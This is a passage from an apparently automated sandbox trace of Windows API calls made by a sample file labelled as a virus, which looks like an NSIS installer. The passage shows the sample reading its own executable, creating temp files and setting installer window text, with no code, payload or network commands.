uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0115.916] wsprintfW (in: param_1=0x19f94e, param_2="%s%S.dll" | out: param_1="\\SHFOLDER.dll") returned 13 [0115.916] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\SHFOLDER.dll", hFile=0x0, dwFlags=0x8) returned 0x6dc10000 [0115.931] GetProcAddress (hModule=0x6dc10000, lpProcName="SHGetFolderPathW") returned 0x6dc11d30 [0115.931] GetModuleHandleA (lpModuleName="SHLWAPI") returned 0x77680000 [0115.931] GetProcAddress (hModule=0x77680000, lpProcName=0x1b5) returned 0x77698dd0 [0115.931] IsOS (dwOS=0x1e) returned 1 [0115.932] InitCommonControls () [0115.932] OleInitialize (pvReserved=0x0) returned 0x0 [0116.206] SHGetFileInfoW (in: pszPath="", dwFileAttributes=0x0, psfi=0x19fb8c, cbFileInfo=0x2b4, uFlags=0x0 | out: psfi=0x19fb8c) returned 0x1 [0116.318] lstrcpynW (in: lpString1=0x429220, lpString2="NSIS Error", iMaxLength=1024 | out: lpString1="NSIS Error") returned="NSIS Error" [0116.319] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\d2ce3b2a5f3efb1fcede96304e57a531.virus.exe\" " [0116.319] lstrcpynW (in: lpString1=0x435000, lpString2="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\d2ce3b2a5f3efb1fcede96304e57a531.virus.exe\" ", iMaxLength=1024 | out: lpString1="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\d2ce3b2a5f3efb1fcede96304e57a531.virus.exe\" ") returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\d2ce3b2a5f3efb1fcede96304e57a531.virus.exe\" " [0116.322] GetTempPathW (in: nBufferLength=0x400, lpBuffer=0x437800 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0116.331] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0116.332] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0116.332] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0116.333] GetLastError () returned 0xb7 [0116.333] GetTickCount () returned 0x151990c [0116.333] GetTempFileNameW (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpPrefixString="nsi", uUnique=0x0, lpTempFileName=0x437000 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsi990C.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsi990c.tmp")) returned 0x990c [0116.336] DeleteFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsi990C.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsi990c.tmp")) returned 1 [0116.337] GetTickCount () returned 0x151990c [0116.337] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x438800, nSize=0x400 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d2ce3b2a5f3efb1fcede96304e57a531.virus.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d2ce3b2a5f3efb1fcede96304e57a531.virus.exe")) returned 0x48 [0116.337] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d2ce3b2a5f3efb1fcede96304e57a531.virus.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d2ce3b2a5f3efb1fcede96304e57a531.virus.exe")) returned 0x20 [0116.337] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d2ce3b2a5f3efb1fcede96304e57a531.virus.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d2ce3b2a5f3efb1fcede96304e57a531.virus.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0x210 [0116.337] lstrcpynW (in: lpString1=0x436800, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d2ce3b2a5f3efb1fcede96304e57a531.virus.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d2ce3b2a5f3efb1fcede96304e57a531.virus.exe") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d2ce3b2a5f3efb1fcede96304e57a531.virus.exe" [0116.338] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d2ce3b2a5f3efb1fcede96304e57a531.virus.exe") returned 72 [0116.339] lstrcpynW (in: lpString1=0x439000, lpString2="d2ce3b2a5f3efb1fcede96304e57a531.virus.exe", iMaxLength=1024 | out: lpString1="d2ce3b2a5f3efb1fcede96304e57a531.virus.exe") returned="d2ce3b2a5f3efb1fcede96304e57a531.virus.exe" [0116.340] GetFileSize (in: hFile=0x210, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1eef2 [0116.340] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.341] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.342] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.342] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.342] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.342] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.342] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.342] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.342] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.342] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.342] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.342] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.342] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.342] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.342] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.342] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.342] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.342] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.342] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.342] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.342] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.342] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.343] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.343] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.343] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.343] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.343] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.343] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.343] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.343] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.343] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.343] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.343] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.343] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.343] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.343] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.343] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.343] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.343] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.343] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.343] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.344] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.344] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.344] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.344] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.344] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.344] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.344] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.344] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.344] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.344] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.344] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.344] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.344] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.344] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.344] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.344] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.344] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.344] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.345] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.345] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.345] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.345] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.345] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.345] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.345] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.345] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.345] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.345] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.345] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.345] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.345] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.345] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0116.346] SetFilePointer (in: hFile=0x210, lDistanceToMove=36892, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x901c [0116.346] ReadFile (in: hFile=0x210, lpBuffer=0x19fb3c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19fa7c, lpOverlapped=0x0 | out: lpBuffer=0x19fb3c*, lpNumberOfBytesRead=0x19fa7c*=0x4, lpOverlapped=0x0) returned 1 [0116.346] GetTickCount () returned 0x151990c [0116.346] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x61d, lpNumberOfBytesRead=0x19fa7c, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19fa7c*=0x61d, lpOverlapped=0x0) returned 1 [0116.390] GetTickCount () returned 0x151993b [0116.390] GetTickCount () returned 0x151993b [0116.390] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x963d [0116.390] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x74580000 [0116.391] GetProcAddress (hModule=0x74580000, lpProcName="GetUserDefaultUILanguage") returned 0x7459b0a0 [0116.391] GetUserDefaultUILanguage () returned 0x409 [0116.394] wsprintfW (in: param_1=0x437000, param_2="%d" | out: param_1="1033") returned 4 [0116.394] wsprintfW (in: param_1=0x437000, param_2="%d" | out: param_1="1033") returned 4 [0116.394] lstrlenW (lpString="ndinjaasev") returned 10 [0116.394] lstrcpynW (in: lpString1=0x429220, lpString2="ndinjaasev Setup", iMaxLength=1024 | out: lpString1="ndinjaasev Setup") returned="ndinjaasev Setup" [0116.394] SetWindowTextW (hWnd=0x0, lpString="ndinjaasev Setup") returned 0 [0116.394] lstrcpynW (in: lpString1=0x6b2ebc, lpString2="ttwrgevakfwu", iMaxLength=1024 | out: lpString1="ttwrgevakfwu") returned="ttwrgevakfwu" [0116.394] lstrcpynW (in: lpString1=0x6b36d4, lpString2="wxzhkncjix", iMaxLength=1024 | out: lpString1="wxzhkncjix") returned="wxzhkncjix" [0116.394] lstrcpynW (in: lpString1=0x425f10, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0116.395] lstrcpynW (in: lpString1=0x425f10, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0116.395] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0116.395] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0116.395] lstrcpynW (in: lpString1=0x435800, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") 